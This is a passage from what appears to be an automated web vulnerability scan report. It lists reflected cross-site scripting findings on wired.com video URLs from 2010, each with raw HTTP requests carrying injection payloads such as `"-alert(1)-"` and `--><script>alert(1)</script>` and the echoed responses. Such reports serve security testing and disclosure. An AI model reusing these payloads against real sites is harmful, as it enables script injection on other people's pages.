This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video25a9b"><a>b1b48537299/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29341
Vary: Accept-Encoding
Cache-Control: max-age=278
Expires: Mon, 22 Nov 2010 00:50:55 GMT
Date: Mon, 22 Nov 2010 00:46:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video25a9b"><a>b1b48537299 ss_search">
...[SNIP]...

1.1271. http://www.wired.com/video/search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba52"><a>8549dae7a51 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/searchcba52"><a>8549dae7a51/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=276
Expires: Mon, 22 Nov 2010 00:52:49 GMT
Date: Mon, 22 Nov 2010 00:48:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_searchcba52"><a>8549dae7a51">
...[SNIP]...

1.1272. http://www.wired.com/video/search/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ddb"-alert(1)-"24d4282cfc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/searchc7ddb"-alert(1)-"24d4282cfc2/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:53:57 GMT
Date: Mon, 22 Nov 2010 00:49:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "video","searchc7ddb"-alert(1)-"24d4282cfc2"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1273. http://www.wired.com/video/security [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87341"><a>5e3fd03ab6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video87341"><a>5e3fd03ab6b/security HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:54:54 GMT
Date: Mon, 22 Nov 2010 00:49:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video87341"><a>5e3fd03ab6b ss_security">
...[SNIP]...

1.1274. http://www.wired.com/video/security [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b027"><a>b24f73bee4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/security5b027"><a>b24f73bee4d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:56:58 GMT
Date: Mon, 22 Nov 2010 00:52:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_security5b027"><a>b24f73bee4d">
...[SNIP]...

1.1275. http://www.wired.com/video/security [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66457"-alert(1)-"8080235918c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/security66457"-alert(1)-"8080235918c HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:58:10 GMT
Date: Mon, 22 Nov 2010 00:53:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "security66457"-alert(1)-"8080235918c","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1276. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/stars-line-up-for-tron-game--evolution/645408465001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6eaf0--><script>alert(1)</script>b17d17bd8db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video6eaf0--><script>alert(1)</script>b17d17bd8db/stars-line-up-for-tron-game--evolution/645408465001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29465
Vary: Accept-Encoding
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:57:53 GMT
Date: Mon, 22 Nov 2010 00:52:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video6eaf0--><script>alert(1)</script>b17d17bd8db/stars-line-up-for-tron-game--evolution/645408465001
-->
...[SNIP]...

1.1277. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/stars-line-up-for-tron-game--evolution/645408465001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4d8"><a>7a613a7e74e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video3b4d8"><a>7a613a7e74e/stars-line-up-for-tron-game--evolution/645408465001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29432
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:10 GMT
Date: Mon, 22 Nov 2010 00:52:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video3b4d8"><a>7a613a7e74e ss_stars-line-up-for-tron-game--evolution c_645408465001">
...[SNIP]...

1.1278. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/stars-line-up-for-tron-game--evolution/645408465001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d824"-alert(1)-"d4829406e77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/stars-line-up-for-tron-game--evolution3d824"-alert(1)-"d4829406e77/645408465001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=279
Expires: Mon, 22 Nov 2010 00:58:45 GMT
Date: Mon, 22 Nov 2010 00:54:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106779


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "645408465001","video","stars-line-up-for-tron-game--evolution3d824"-alert(1)-"d4829406e77"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1279. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/stars-line-up-for-tron-game--evolution/645408465001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abd75"><a>4bcfe5fa8de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/stars-line-up-for-tron-game--evolutionabd75"><a>4bcfe5fa8de/645408465001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=275
Expires: Mon, 22 Nov 2010 00:57:35 GMT
Date: Mon, 22 Nov 2010 00:53:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_stars-line-up-for-tron-game--evolutionabd75"><a>4bcfe5fa8de c_645408465001">
...[SNIP]...

1.1280. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/stars-line-up-for-tron-game--evolution/645408465001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2769"-alert(1)-"afb5406fedf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/stars-line-up-for-tron-game--evolution/645408465001f2769"-alert(1)-"afb5406fedf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:55 GMT
Date: Mon, 22 Nov 2010 00:54:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "645408465001f2769"-alert(1)-"afb5406fedf","stars-line-up-for-tron-game--evolution","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1281. http://www.wired.com/video/stars-line-up-for-tron-game--evolution/645408465001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/stars-line-up-for-tron-game--evolution/645408465001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437aa"><a>4f2862441ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/stars-line-up-for-tron-game--evolution/645408465001437aa"><a>4f2862441ba HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=284
Expires: Mon, 22 Nov 2010 00:58:56 GMT
Date: Mon, 22 Nov 2010 00:54:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_stars-line-up-for-tron-game--evolution c_645408465001437aa"><a>4f2862441ba">
...[SNIP]...

1.1282. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/the-casting-of-galaxy-quest/21738564001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6de"><a>cf9acababf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videode6de"><a>cf9acababf3/the-casting-of-galaxy-quest/21738564001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29408
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:56:12 GMT
Date: Mon, 22 Nov 2010 00:51:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videode6de"><a>cf9acababf3 ss_the-casting-of-galaxy-quest c_21738564001">
...[SNIP]...

1.1283. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/the-casting-of-galaxy-quest/21738564001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c29b5--><script>alert(1)</script>ce95a1bfb75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoc29b5--><script>alert(1)</script>ce95a1bfb75/the-casting-of-galaxy-quest/21738564001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29442
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:56:46 GMT
Date: Mon, 22 Nov 2010 00:51:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoc29b5--><script>alert(1)</script>ce95a1bfb75/the-casting-of-galaxy-quest/21738564001
-->
...[SNIP]...

1.1284. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/the-casting-of-galaxy-quest/21738564001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84baf"><a>3f47118c743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/the-casting-of-galaxy-quest84baf"><a>3f47118c743/21738564001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:56:40 GMT
Date: Mon, 22 Nov 2010 00:51:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_the-casting-of-galaxy-quest84baf"><a>3f47118c743 c_21738564001">
...[SNIP]...

1.1285. http://www.wired.com/video/the-casting-of-galaxy-quest/21738564001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/the-casting-of-galaxy-quest/21738564001

Issue detail

